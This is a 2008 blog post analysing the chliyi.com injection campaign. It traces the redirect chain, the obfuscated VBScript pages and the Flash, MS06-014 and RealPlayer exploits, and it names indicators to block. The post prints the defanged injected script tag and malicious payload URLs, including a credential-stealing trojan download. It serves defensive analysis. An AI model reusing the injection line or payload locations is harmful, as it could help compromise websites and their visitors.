Malicious Site Analysis for chliyi.com injection
Posted by jeremy on 29th May 2008
According to my Google searching chliyi.com has successfully been injected onto about ~12,000 sites. This malicious domain is using the well publicized Adobe Flash vulnerability along with a few others. The good news is Symantec Threatcon has retracted their declaration of this being a 0-day exploit, and have since clarified with the help of Adobe this exploit does not work on the newest version of the Flash Player version 9.0.124.0. This site is not very complex in structure, as the following site map demonstrates:
As you can see the entry page for this injection is chliyi.com/reg.js using the following code
<script src=hxxp://www.chliyi.com/reg.js>
hxxp://www.chliyi.com/reg.js
This file contains no obfustication, but does contain some interesting logic as you can see.
Obviously if you are using the Chinese language pack you won't receive any of the malicious code, so I would assume the Authors want to avoid exploiting Chinese clients. With that I also believe that this round of injections was most likely performed be a Chinese organization.
hxxp://www.chliyi.com/img/info.htm
This page is where the obfustication starts. This also starts the decision tree for choosing which exploits to serve to a user being directed to this malicious domain. The first obfustication is done with VBScript and looks like this:
My first deobfustication revealed even more VBScript obfustication and can be seen here:
After the second deobfustication we see the first portion of the decision tree in choosing which exploits to send to the users computer. The first test tries to create an Adobe.Stream object with the clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 classid, which would identify a browser that is possibly susceptible to the MS06-014 vulnerability. If the creation is successfully the next page that the user is directed to is the help.htm page, and if it is unsuccessfully created the user will be sent over to a serious of exploits to include the highly publicized Flash Player exploit.
hxxp://www.chliyi.com/img/help.htm
The help.htm file is obfusticated with VBScript as well, but defiantly not as complicated. The obfusticated page looked like this:
Deobfusticated it is very clear what vulnerability the Authors are targeting. The MS06-014 vulnerability is an older vulnerability, but it must still have a very good success rate as lots of malicious code is still targeting it. It was only last month that the famous Mpack tool kit stopped including it, so as everyone has said before me keep you systems patched to avoid old vulnerabilities like this one from being exploited on your systems.
If the exploit is successful the user will download hxxp://www.jj120.net/inc/fuckjp.exe binary. VirusTotal results for this are fair with 22/32 (68.75%) which can be seen here: VirusTotal Results. Running this Trojan in my lab it grabbed two more files: FLoader.exe and WLoader.exe, which from my analysis are World of Warcraft account credential stealer's. Their respective VirusTotal results can be found here: FLoader Results and WLoader.exe Results. Obviously the gaming industry offers something valuable for the site authors. Here lately I have started to see a lot more of these types of Trojans, where specific account information is being stolen for gaming sites instead of the normal email and bank info stealer's.
hxxp://www.chliyi.com/img/flash.swf
This is obviously the Flash player exploit getting so much attention in the last few days. Most of the other sites using this exploit are embedding an Action Script that will actually direct you to load different Flash files using exploits based off your browser. For example most sites will separate the Firefox file from the IE file being used, but this one is not as sophisticated and serves only one flash media file. The flash decompile looks like this using swfdump:
A code extraction attempt using flare showed this:
I am fairly new at deobfusticating Flash files, but what I did notice is there is no action script associated with the exploit. You can read the security bulletin posted by Adobe for more information, and if you happen to run across the toolkit or actual exploit documentation feel free to send it my way.
Also here are the VirusTotal results for Flash.swf.
hxxp://www.chliyi.com/img/real.htm
This is another VBScript obfusticated page, but this time targeting the Real Player (CVE-2007-5601) vulnerability. This is just another example of why system administrators need to pay attention to software updates outside the normal Microsoft Windows and Microsoft Office updates being published once a month. The deobfustication process took two VBScript deobfustications to display the actual JavaScript rendered exploit seen here:
I didn't include the obfusticated code snapshots as they were actually very large files with to many lines to try and take screen shots that would display properly in this post. If you need them I can send them your way or post them up for download, just ask.
hxxp://www.chliyi.com/img/new.htm
The new.htm file is another attempt at exploiting a known vulnerability in Real Player (CVE-2008-1309). This deobfustication took 2 VBScript decodes to render the following code:
Obviously none of these exploits being severed up by this malicious domain are 0-day's, so if you will just keep your systems up to date and exercise alittle bit of caution when surfing the internet you should be ok. One obvious plugin I would highly recommend is the NoScript plugin for Firefox, as it will definitely aid in stopping these scripts from executing without your permission. I would also suggest the filtering of the domain names seen in this analysis chliyi.com and jj120.net at the very minimum if you have that capability. Another option would be to block the IPs associated with these domain chliyi.com (218.30.96.87) and jj120.net (61.142.250.221), this sometimes leads to legitimate sites being blocked as they could be on a shared host. I checked all the A and CNAME records associated with those IPs and didn't see anything that looked legitimate or popular. I would rather block now and apologize later, but this is definitely not the corporate standard.
I also wasn't surprised at all to see who the registrars for these two hostile domains were as they seem to be very popular with the Malware writing community lately.
Domain Name: CHLIYI.COM
Registrar: BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN
Whois Server: whois.dns.com.cn
Referral URL: http://www.dns.com.cn
Name Server: DNS21.HICHINA.COM
Name Server: DNS22.HICHINA.COM
Status: ok
Updated Date: 24-jan-2008
Creation Date: 12-jun-2003
Expiration Date: 12-jun-2008
Domain Name: JJ120.NET
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: NS1.72DNS.COM
Name Server: NS2.72DNS.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 09-mar-2008
Creation Date: 07-mar-2006
Expiration Date: 07-mar-2009
As always if you have any questions or comments feel free to contact me or leave them here.
Posted in Malicious Domain | 1 Comment »











